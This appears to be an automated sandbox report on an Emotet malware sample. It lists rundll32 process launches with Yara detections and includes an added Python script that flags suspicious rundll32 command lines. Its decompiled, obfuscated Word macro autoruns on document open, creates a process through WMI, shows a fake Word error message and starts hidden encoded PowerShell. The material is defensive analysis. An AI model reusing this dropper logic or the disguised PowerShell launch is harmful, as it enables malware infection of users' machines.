                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2197495102.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2199714499.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2197524650.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:04:32
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2207082899.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2207752996.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2207040108.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:18:04:36
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2218991532.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2217422949.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2217659193.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:18:04:41
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2226062410.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2226800833.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2226045292.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:18:04:45
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2339396360.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2341403788.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2339372095.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
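
The rundll32 launches above share a shape a detection engineer can key on: the module is loaded from a randomly named subfolder of SysWOW64, carries a non-.dll extension (.tgo, .tjx, .nsu, .xcm, .lrs), and is invoked first by an export name and then again by ordinal #1. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not Emotet's code. It parses the command lines recorded above plus one constructed benign control line and flags those three traits. The heuristics, the expected-extension list and the "subfolder of the system directory" check are the editor's own assumptions, not a vendor or Sigma rule.

```python
"""Triage rundll32 command lines from a sandbox process listing.

Added example for this page. The first five command lines are copied from
the process entries above; the last one is a constructed benign control.
The three heuristics are the editor's own, not a Joe Sandbox or Sigma rule.
"""
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_CMDLINES = [
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1",
    # constructed benign control: how Control Panel applets are normally opened
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",
]

# rundll32 syntax is "<module>,<entry>" where <entry> is an export name or
# "#<ordinal>". The module path may be wrapped in single or double quotes.
RUNDLL_RE = re.compile(
    r"""rundll32(?:\.exe)?\s+
        (?P<quote>['"]?)(?P<module>[^'",]+)(?P=quote)
        \s*,\s*(?P<entry>\S+)""",
    re.IGNORECASE | re.VERBOSE,
)

# Extensions rundll32 legitimately loads (assumption); anything else is worth a look.
EXPECTED_EXTS = {".dll", ".cpl", ".ax"}

# A module one directory level below SysWOW64/System32: Windows keeps its
# own DLLs directly in the system directory, not in random-named subfolders.
SYSDIR_SUBFOLDER_RE = re.compile(r"\\(?:syswow64|system32)\\[^\\]+\\[^\\]+$")


@dataclass
class Finding:
    cmdline: str
    module: str
    entry: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def triage(cmdline: str) -> Optional[Finding]:
    """Return a Finding for a rundll32 command line, or None if it is not one."""
    m = RUNDLL_RE.search(cmdline)
    if m is None:
        return None
    finding = Finding(cmdline, m["module"], m["entry"])
    module = finding.module.lower()

    # 1. Call by ordinal instead of export name (the "#1" second launch above).
    if finding.entry.startswith("#"):
        finding.reasons.append("call by ordinal")

    # 2. Module extension is not one rundll32 normally loads (.tgo, .tjx, .lrs).
    ext = ntpath.splitext(module)[1]
    if ext not in EXPECTED_EXTS:
        finding.reasons.append(f"unexpected module extension '{ext}'")

    # 3. Module dropped into a subfolder of the system directory.
    if SYSDIR_SUBFOLDER_RE.search(module):
        finding.reasons.append("module in a subfolder of the system directory")
    return finding


def triage_all(cmdlines) -> List[Finding]:
    """Triage every line; non-rundll32 lines are skipped."""
    return [f for f in (triage(c) for c in cmdlines) if f is not None]


if __name__ == "__main__":
    for f in triage_all(SAMPLE_CMDLINES):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.module} , {f.entry}  {'; '.join(f.reasons)}")
```

The first launch of each DLL trips two of the three checks and the ordinal relaunch trips all three, while the shell32.dll control line trips none; in a real pipeline the same function would run over Sysmon event ID 1 or EDR process-creation records rather than a pasted list.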

                                                                    Disassembly

                                                                    Code Analysis

Module: Tvh1u8793dltn9

Declaration (line: content)
1: Attribute VB_Name = "Tvh1u8793dltn9"
2: Attribute VB_Base = "1Normal.ThisDocument"
3: Attribute VB_GlobalNameSpace = False
4: Attribute VB_Creatable = False
5: Attribute VB_PredeclaredId = True
6: Attribute VB_Exposed = True
7: Attribute VB_TemplateDerived = True
8: Attribute VB_Customizable = True

Executed Functions

APIs / Meta Information: every call below was recorded as part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf, in the order the sandbox logged it. Names that are not Word object-model members or VBA built-ins (IFmVwCk, PwelHHe, Ga63a6ozyok1lu and the like) are the macro's own procedures. The same Paragraphs / Range / Range / UBound / <helper> / MidB$ sequence repeats eleven times, with CreateObject appearing in the eighth round and Create in the tenth.

IFmVwCk, Paragraphs, Range, Range, UBound, PwelHHe, MidB$, Ga63a6ozyok1lu, Content, P74x_w06z8wy
DOUPnxsoh, Paragraphs, Range, Range, UBound, tmhzE, MidB$
obTyv, Paragraphs, Range, Range, UBound, JoHgzC, MidB$
BYQeC, Paragraphs, Range, Range, UBound, PpRoB, MidB$
OfcyMA, Paragraphs, Range, Range, UBound, VFEoD, MidB$, Mid, Name, Application
AOSGE, Paragraphs, Range, Range, UBound, zIlZF, MidB$
IeEnJ, Paragraphs, Range, Range, UBound, PRawGB, MidB$
NDNfzBJJ, Paragraphs, Range, Range, UBound, BLbjEJvG, MidB$, CreateObject
BeNoB, Paragraphs, Range, Range, UBound, qqdsB, MidB$, Mid, Len
SlFMhE, Paragraphs, Range, Range, UBound, TtNYEBE, MidB$, Create, Koy_r2oxzs1, X2yj58n39t50co
kxpwbBJF, Paragraphs, Range, Range, UBound, UYxXOcIJG, MidB$

Line | Instruction | Meta Information
9 | Private Sub Document_open() |
10 | Cfqzsexf2_k | executed
11 | End Sub |

Module: Twh1gb2mpd3

Declaration
Line | Content
1 | Attribute VB_Name = "Twh1gb2mpd3"

Module: X1bqz0qaer43b52bf

Declaration
Line | Content
1 | Attribute VB_Name = "X1bqz0qaer43b52bf"

Executed Functions

APIs / Meta Information
IFmVwCk
Paragraphs
Range
Range
UBound
PwelHHe
MidB$
Ga63a6ozyok1lu
Content
P74x_w06z8wy
DOUPnxsoh
Paragraphs
Range
Range
UBound
tmhzE
MidB$
obTyv
Paragraphs
Range
Range
UBound
JoHgzC
MidB$
BYQeC
Paragraphs
Range
Range
UBound
PpRoB
MidB$
OfcyMA
Paragraphs
Range
Range
UBound
VFEoD
MidB$
Mid
Name
Application
AOSGE
Paragraphs
Range
Range
UBound
zIlZF
MidB$
IeEnJ
Paragraphs
Range
Range
UBound
PRawGB
MidB$
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: bHGFAGJ
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: OaOIEKmCA
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: DHwdFs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: mwvhyA
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: prgAO
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: imnrzOF
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UmQHurWB
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: WhmkB
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
NDNfzBJJ
Paragraphs
Range
Range
UBound
BLbjEJvG
MidB$
CreateObject
    CreateObject("winmgmts:win32_process")
BeNoB
Paragraphs
Range
Range
UBound
qqdsB
MidB$
Mid
Len

Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: bHGFAGJ
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: OaOIEKmCA
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: DHwdFs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: mwvhyA
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: prgAO
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: imnrzOF
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UmQHurWB
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: WhmkB
Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$
SlFMhE
Paragraphs
Range
Range
UBound
TtNYEBE
MidB$
Create
    SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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,,) -> 0
Koy_r2oxzs1
X2yj58n39t50co
kxpwbBJF
Paragraphs
Range
Range
UBound
UYxXOcIJG
MidB$
Strings / Decrypted Strings
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh bpx [ sh b"
"x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh bx [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
Line | Instruction | Meta Information
2 | Function Cfqzsexf2_k() |
3 | Goto duvyGCCDG | executed
4 | Set IacBICp = IFmVwCk | IFmVwCk
5 | Dim wzeYO, ZXUkHUDE, dWLbDBA as Long |
6 | Dim bZSWsqlD as Word.Paragraph |
7 | Dim wqMdGGa() as Byte |
8 | For Each bZSWsqlD in Tvh1u8793dltn9.Paragraphs | Paragraphs
9 | wqMdGGa = bZSWsqlD.Range | Range
10 | dscc = "sadsaccc" & bZSWsqlD.Range | Range
11 | ZXUkHUDE = UBound(wqMdGGa) - 1 | UBound
12 | wzeYO = 0 |
13 | Set oTxSFKM = PwelHHe | PwelHHe
14 | Do Until ZXUkHUDE > ZXUkHUDE |
15 | If wqMdGGa(ZXUkHUDE) = 46 Or ZXUkHUDE = ZXUkHUDE Then |
16 | dscc = "sasdsacc" & (wzeYO / 2) + 1 & " to " & (ZXUkHUDE / 2) + 1 & MidB$(wqMdGGa, wzeYO + 1, ZXUkHUDE - wzeYO + 3) | MidB$
17 | wzeYO = ZXUkHUDE + 2 |
18 | Endif |
19 | ZXUkHUDE = ZXUkHUDE + 2 |
20 | Loop |
21 | Next | Paragraphs
21 | duvyGCCDG: |
23 | skuwd = Ga63a6ozyok1lu + Tvh1u8793dltn9.Content + P74x_w06z8wy | Ga63a6ozyok1lu, Content, P74x_w06z8wy
26 | Goto NreFC |
27 | Set zkqnNAIz = DOUPnxsoh | DOUPnxsoh
28 | Dim ofBYJAJ, LfOAoxD, gNcNXLsAj as Long |
29 | Dim BMfqCFLcE as Word.Paragraph |
30 | Dim zxBvQRHoF() as Byte |
31 | For Each BMfqCFLcE in Tvh1u8793dltn9.Paragraphs | Paragraphs
32 | zxBvQRHoF = BMfqCFLcE.Range | Range
33 | dscc = "sadsaccc" & BMfqCFLcE.Range | Range
34 | LfOAoxD = UBound(zxBvQRHoF) - 1 | UBound

                                                                    35

                                                                    ofBYJAJ = 0

                                                                    36

                                                                    Set GXzgs = tmhzE

                                                                    tmhzE

                                                                    37

                                                                    Do Until LfOAoxD > LfOAoxD

                                                                    38

                                                                    If zxBvQRHoF(LfOAoxD) = 46 Or LfOAoxD = LfOAoxD Then

                                                                    39

                                                                    dscc = "sasdsacc" & (ofBYJAJ / 2) + 1 & " to " & (LfOAoxD / 2) + 1 & MidB$(zxBvQRHoF, ofBYJAJ + 1, LfOAoxD - ofBYJAJ + 3)

                                                                    MidB$

                                                                    40

                                                                    ofBYJAJ = LfOAoxD + 2

                                                                    41

                                                                    Endif

                                                                    42

                                                                    LfOAoxD = LfOAoxD + 2

                                                                    43

                                                                    Loop

                                                                    44

                                                                    Next

                                                                    Paragraphs

                                                                    44

                                                                    NreFC:

                                                                    46

                                                                    wjnsc = "x [ sh bpx [ sh b"

                                                                    47

                                                                    T8m6rm0ljeoit = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"

                                                                    48

                                                                    Goto fNBrHlEAv

                                                                    49

                                                                    Set JJlPCJ = obTyv

                                                                    obTyv

                                                                    50

                                                                    Dim wJpzu, IFdNKp, KgsfYDHSH as Long

                                                                    51

                                                                    Dim rVJUDUKH as Word.Paragraph

                                                                    52

                                                                    Dim cXPNdFE() as Byte

                                                                    53

                                                                    For Each rVJUDUKH in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    54

                                                                    cXPNdFE = rVJUDUKH.Range

                                                                    Range

                                                                    55

                                                                    dscc = "sadsaccc" & rVJUDUKH.Range

                                                                    Range

                                                                    56

                                                                    IFdNKp = UBound(cXPNdFE) - 1

                                                                    UBound

                                                                    57

                                                                    wJpzu = 0

                                                                    58

                                                                    Set XHCLGl = JoHgzC

                                                                    JoHgzC

                                                                    59

                                                                    Do Until IFdNKp > IFdNKp

                                                                    60

                                                                    If cXPNdFE(IFdNKp) = 46 Or IFdNKp = IFdNKp Then

                                                                    61

                                                                    dscc = "sasdsacc" & (wJpzu / 2) + 1 & " to " & (IFdNKp / 2) + 1 & MidB$(cXPNdFE, wJpzu + 1, IFdNKp - wJpzu + 3)

                                                                    MidB$

                                                                    62

                                                                    wJpzu = IFdNKp + 2

                                                                    63

                                                                    Endif

                                                                    64

                                                                    IFdNKp = IFdNKp + 2

                                                                    65

                                                                    Loop

                                                                    66

                                                                    Next

                                                                    Paragraphs

                                                                    66

                                                                    fNBrHlEAv:

                                                                    68

                                                                    Cyum5s6729q4h = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"

                                                                    69

                                                                    Goto KAIEzBBDB

                                                                    70

                                                                    Set lMxOJUo = BYQeC

                                                                    BYQeC

                                                                    71

                                                                    Dim mDUMGI, KwsnJ, cwrlb as Long

                                                                    72

                                                                    Dim PlllYA as Word.Paragraph

                                                                    73

                                                                    Dim bIdgDIKT() as Byte

                                                                    74

                                                                    For Each PlllYA in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    75

                                                                    bIdgDIKT = PlllYA.Range

                                                                    Range

                                                                    76

                                                                    dscc = "sadsaccc" & PlllYA.Range

                                                                    Range

                                                                    77

                                                                    KwsnJ = UBound(bIdgDIKT) - 1

                                                                    UBound

                                                                    78

                                                                    mDUMGI = 0

                                                                    79

                                                                    Set OELBME = PpRoB

                                                                    PpRoB

                                                                    80

                                                                    Do Until KwsnJ > KwsnJ

                                                                    81

                                                                    If bIdgDIKT(KwsnJ) = 46 Or KwsnJ = KwsnJ Then

                                                                    82

                                                                    dscc = "sasdsacc" & (mDUMGI / 2) + 1 & " to " & (KwsnJ / 2) + 1 & MidB$(bIdgDIKT, mDUMGI + 1, KwsnJ - mDUMGI + 3)

                                                                    MidB$

                                                                    83

                                                                    mDUMGI = KwsnJ + 2

                                                                    84

                                                                    Endif

                                                                    85

                                                                    KwsnJ = KwsnJ + 2

                                                                    86

                                                                    Loop

                                                                    87

                                                                    Next

                                                                    Paragraphs

                                                                    87

                                                                    KAIEzBBDB:

                                                                    89

                                                                    D72efu7a0how7es = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"

                                                                    90

                                                                    Goto OXSmB

                                                                    91

                                                                    Set opZGEJ = OfcyMA

                                                                    OfcyMA

                                                                    92

                                                                    Dim UZSgXY, SWiOAACq, axfnb as Long

                                                                    93

                                                                    Dim RSOyLFC as Word.Paragraph

                                                                    94

                                                                    Dim qZUuB() as Byte

                                                                    95

                                                                    For Each RSOyLFC in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    96

                                                                    qZUuB = RSOyLFC.Range

                                                                    Range

                                                                    97

                                                                    dscc = "sadsaccc" & RSOyLFC.Range

                                                                    Range

                                                                    98

                                                                    SWiOAACq = UBound(qZUuB) - 1

                                                                    UBound

                                                                    99

                                                                    UZSgXY = 0

                                                                    100

                                                                    Set fFCxQGp = VFEoD

                                                                    VFEoD

                                                                    101

                                                                    Do Until SWiOAACq > SWiOAACq

                                                                    102

                                                                    If qZUuB(SWiOAACq) = 46 Or SWiOAACq = SWiOAACq Then

                                                                    103

                                                                    dscc = "sasdsacc" & (UZSgXY / 2) + 1 & " to " & (SWiOAACq / 2) + 1 & MidB$(qZUuB, UZSgXY + 1, SWiOAACq - UZSgXY + 3)

                                                                    MidB$

                                                                    104

                                                                    UZSgXY = SWiOAACq + 2

                                                                    105

                                                                    Endif

                                                                    106

                                                                    SWiOAACq = SWiOAACq + 2

                                                                    107

                                                                    Loop

                                                                    108

                                                                    Next

                                                                    Paragraphs

                                                                    108

                                                                    OXSmB:

                                                                    110

                                                                    C22jnnyve59b2 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"

                                                                    Mid

                                                                    Name

                                                                    Application

                                                                    111

                                                                    Goto rYDvv

                                                                    112

                                                                    Set GOSKJ = AOSGE

                                                                    AOSGE

                                                                    113

                                                                    Dim pblpJEP, yNTJYEFj, EFfaBWHC as Long

                                                                    114

                                                                    Dim OlVYDaAK as Word.Paragraph

                                                                    115

                                                                    Dim iVxnxGH() as Byte

                                                                    116

                                                                    For Each OlVYDaAK in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    117

                                                                    iVxnxGH = OlVYDaAK.Range

                                                                    Range

                                                                    118

                                                                    dscc = "sadsaccc" & OlVYDaAK.Range

                                                                    Range

                                                                    119

                                                                    yNTJYEFj = UBound(iVxnxGH) - 1

                                                                    UBound

                                                                    120

                                                                    pblpJEP = 0

                                                                    121

                                                                    Set bquxP = zIlZF

                                                                    zIlZF

                                                                    122

                                                                    Do Until yNTJYEFj > yNTJYEFj

                                                                    123

                                                                    If iVxnxGH(yNTJYEFj) = 46 Or yNTJYEFj = yNTJYEFj Then

                                                                    124

                                                                    dscc = "sasdsacc" & (pblpJEP / 2) + 1 & " to " & (yNTJYEFj / 2) + 1 & MidB$(iVxnxGH, pblpJEP + 1, yNTJYEFj - pblpJEP + 3)

                                                                    MidB$

                                                                    125

                                                                    pblpJEP = yNTJYEFj + 2

                                                                    126

                                                                    Endif

                                                                    127

                                                                    yNTJYEFj = yNTJYEFj + 2

                                                                    128

                                                                    Loop

                                                                    129

                                                                    Next

                                                                    Paragraphs

                                                                    129

                                                                    rYDvv:

                                                                    131

                                                                    Cew5ncdrgctcj = D72efu7a0how7es + C22jnnyve59b2 + Cyum5s6729q4h + wjnsc + T8m6rm0ljeoit

                                                                    132

                                                                    Goto tgyiIBI

                                                                    133

                                                                    Set yJRyW = IeEnJ

                                                                    IeEnJ

                                                                    134

                                                                    Dim FJGWlF, boTEsG, DAKdJA as Long

                                                                    135

                                                                    Dim kjSGfNWH as Word.Paragraph

                                                                    136

                                                                    Dim NTrejcdK() as Byte

                                                                    137

                                                                    For Each kjSGfNWH in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    138

                                                                    NTrejcdK = kjSGfNWH.Range

                                                                    Range

                                                                    139

                                                                    dscc = "sadsaccc" & kjSGfNWH.Range

                                                                    Range

                                                                    140

                                                                    boTEsG = UBound(NTrejcdK) - 1

                                                                    UBound

                                                                    141

                                                                    FJGWlF = 0

                                                                    142

                                                                    Set LVHhGsGJd = PRawGB

                                                                    PRawGB

                                                                    143

                                                                    Do Until boTEsG > boTEsG

                                                                    144

                                                                    If NTrejcdK(boTEsG) = 46 Or boTEsG = boTEsG Then

                                                                    145

                                                                    dscc = "sasdsacc" & (FJGWlF / 2) + 1 & " to " & (boTEsG / 2) + 1 & MidB$(NTrejcdK, FJGWlF + 1, boTEsG - FJGWlF + 3)

                                                                    MidB$

                                                                    146

                                                                    FJGWlF = boTEsG + 2

                                                                    147

                                                                    Endif

                                                                    148

                                                                    boTEsG = boTEsG + 2

                                                                    149

                                                                    Loop

                                                                    150

                                                                    Next

                                                                    Paragraphs

                                                                    150

                                                                    tgyiIBI:

                                                                    152

                                                                    Pey8y7gr_e6_y = K532dwnyk0pybrc(Cew5ncdrgctcj)

                                                                    153

                                                                    Goto urNCUFJBF

                                                                    154

                                                                    Set aekya = NDNfzBJJ

                                                                    NDNfzBJJ

                                                                    155

                                                                    Dim QyRiIm, WEIxlI, rZGGJBDEH as Long

                                                                    156

                                                                    Dim EvkuEA as Word.Paragraph

                                                                    157

                                                                    Dim ZFzwZcA() as Byte

                                                                    158

                                                                    For Each EvkuEA in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    159

                                                                    ZFzwZcA = EvkuEA.Range

                                                                    Range

                                                                    160

                                                                    dscc = "sadsaccc" & EvkuEA.Range

                                                                    Range

                                                                    161

                                                                    WEIxlI = UBound(ZFzwZcA) - 1

                                                                    UBound

                                                                    162

                                                                    QyRiIm = 0

                                                                    163

                                                                    Set Gownu = BLbjEJvG

                                                                    BLbjEJvG

                                                                    164

                                                                    Do Until WEIxlI > WEIxlI

                                                                    165

                                                                    If ZFzwZcA(WEIxlI) = 46 Or WEIxlI = WEIxlI Then

                                                                    166

